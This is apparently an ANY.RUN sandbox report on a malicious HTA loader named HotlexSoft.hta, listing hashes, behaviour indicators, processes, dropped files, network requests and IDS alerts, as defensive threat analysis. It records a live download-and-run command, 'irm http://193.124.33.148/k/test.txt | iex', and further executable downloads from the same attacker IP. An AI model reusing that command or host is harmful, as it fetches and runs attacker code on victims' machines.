File name:

HotlexSoft.hta

Full analysis: https://app.any.run/tasks/59be9f4e-84d4-49a4-ad9b-11774727909a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: December 29, 2023, 18:11:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
Indicators:
MIME: text/html
File info: HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

E78E6E811435E6EFA0BC9B729925F022

SHA1:

6BAD7E843190D41B5E11CDCDE33F36D0A5999F14

SHA256:

871B52FFB40446AD5C7B43DE9AA7BFA9C1878654964ECDC65336AE0EA9F9186E

SSDEEP:

384:AijroQqaAgRYhyiOJo40gw38yy+662qSk0QvubGDb7/HyiPZuN49fnew2fwSWX2m:Aiv5qaYdKiV3iPuPyk9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses base64 encoding (SCRIPT)

      • mshta.exe (PID: 2040)

    • Starts Visual C# compiler

      • powershell.exe (PID: 2076)

  • SUSPICIOUS

    • Creates XML DOM element (SCRIPT)

      • mshta.exe (PID: 2040)

    • Reads the Internet Settings

      • mshta.exe (PID: 2040)
      • powershell.exe (PID: 2076)

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • mshta.exe (PID: 2040)

    • Sets XML DOM element text (SCRIPT)

      • mshta.exe (PID: 2040)

    • Reads data from a binary Stream object (SCRIPT)

      • mshta.exe (PID: 2040)

    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 2040)

    • Changes charset (SCRIPT)

      • mshta.exe (PID: 2040)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 2040)

    • Found IP address in command line

      • powershell.exe (PID: 2076)

    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 2040)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 2040)

    • Uses .NET C# to load dll

      • powershell.exe (PID: 2076)

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 2040)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2040)

    • Checks supported languages

      • csc.exe (PID: 1588)
      • cvtres.exe (PID: 572)
      • RegAsm.exe (PID: 1840)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 1588)
      • cvtres.exe (PID: 572)

    • Create files in a temporary directory

      • csc.exe (PID: 1588)
      • cvtres.exe (PID: 572)

    • Drops the executable file immediately after the start

      • csc.exe (PID: 1588)

    • Connects to the server without a host name

      • powershell.exe (PID: 2076)

    • Unusual connection from system programs

      • powershell.exe (PID: 2076)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 2076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.htm/html | HyperText Markup Language with DOCTYPE (80.6)
.html | HyperText Markup Language (19.3)

EXIF

HTML

ContentType: text/html; charset=UTF-8
Viewport: width=device-width, initial-scale=1.0
Title: PHP: ZipArchive::setCompressionIndex - Manual
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe no specs powershell.exe csc.exe no specs cvtres.exe no specs regasm.exe

Process information

PID
CMD
Path
Indicators
Parent process
572C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESFB29.tmp" "c:\Users\admin\AppData\Local\Temp\CSC8CD89968CAE54B2F82D36F4A2C196620.TMP"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.10.25028.0 built by: VCTOOLSD15RTM
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\vcruntime140_clr0400.dll
c:\windows\system32\ucrtbase_clr0400.dll
1588"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\5iovyj4n.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.3761.0 built by: NET48REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\vcruntime140_clr0400.dll
c:\windows\system32\ucrtbase_clr0400.dll
1840C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
3221225477
Version:
4.8.3761.0 built by: NET48REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
2040"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\HotlexSoft.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm http://193.124.33.148/k/test.txt | iexC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
3 339
Read events
3 273
Write events
66
Delete events
0

Modification events

(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
460000005B010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2040) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2076) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
1
Suspicious files
8
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2076powershell.exeC:\Users\admin\AppData\Local\Temp\5iovyj4n.cmdlinetext
MD5:C05E263274D7183C1E73DEB3F12644D0
SHA256:B12FC77336A8DE8717624330DD99732F954C3B66E81CF1F2D171B45A765EDD60
2076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:F500255BDC0DD45A0934243E38529D10
SHA256:AD4304402753CEF71770C63692428001309617BDA00D87E229D197721D29496E
1588csc.exeC:\Users\admin\AppData\Local\Temp\CSC8CD89968CAE54B2F82D36F4A2C196620.TMPbinary
MD5:8E69A034AB2D3AF870A41C176D92FDCF
SHA256:FBB7581400AF359D38FD8546A024A8F16FA518192C76841EEB147268EF36922B
2076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFdf780.TMPbinary
MD5:0268C3470C936E6FBAC2945B9E1C2099
SHA256:DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9
2076powershell.exeC:\Users\admin\AppData\Local\Temp\ef1sc3f2.00h.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2076powershell.exeC:\Users\admin\AppData\Local\Temp\kc3l3zzb.114.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2076powershell.exeC:\Users\admin\AppData\Local\Temp\5iovyj4n.0.cstext
MD5:02F8589FCD6E664F168F7969939D2EE8
SHA256:79ECF2D105B7359CB7E4239597DE77A5A10A7DB77BB2E4320F0F00BBCB03389F
2076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BQ8ZQ9L10SIQMJSW4E2W.tempbinary
MD5:F500255BDC0DD45A0934243E38529D10
SHA256:AD4304402753CEF71770C63692428001309617BDA00D87E229D197721D29496E
572cvtres.exeC:\Users\admin\AppData\Local\Temp\RESFB29.tmpbinary
MD5:B6A610F655CA0794E1A395B0A2B515F7
SHA256:F30306156BADDEE1EC739C9E1504DB782CC8B89ED00B8CAE6CDB297553A60FA8
1588csc.exeC:\Users\admin\AppData\Local\Temp\5iovyj4n.dllexecutable
MD5:29D981FD26678A3995B76FD9984D1569
SHA256:D30EC7BFBCC6AEE561CFE16EFCCC5DE10E15943BA273F0D778E58F7B953F93D2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
1
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2076
powershell.exe
GET
200
193.124.33.148:80
http://193.124.33.148/k/test.txt
unknown
text
645 b
unknown
2076
powershell.exe
GET
200
193.124.33.148:80
http://193.124.33.148/k/loadtobadxml.exe
unknown
executable
6.00 Kb
unknown
2076
powershell.exe
GET
200
193.124.33.148:80
http://193.124.33.148/k/payload.bin
unknown
binary
2.38 Mb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:138
whitelisted
2076
powershell.exe
193.124.33.148:80
RU
unknown

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2076
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2076
powershell.exe
Potential Corporate Privacy Violation
AV POLICY HTTP request for .exe file with no User-Agent
2076
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
2076
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2076
powershell.exe
Misc activity
ET HUNTING Suspicious Windows Executable WriteProcessMemory
2076
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2076
powershell.exe
Misc activity
ET HUNTING Suspicious Windows Executable CreateRemoteThread
2076
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
HotlexSoft.hta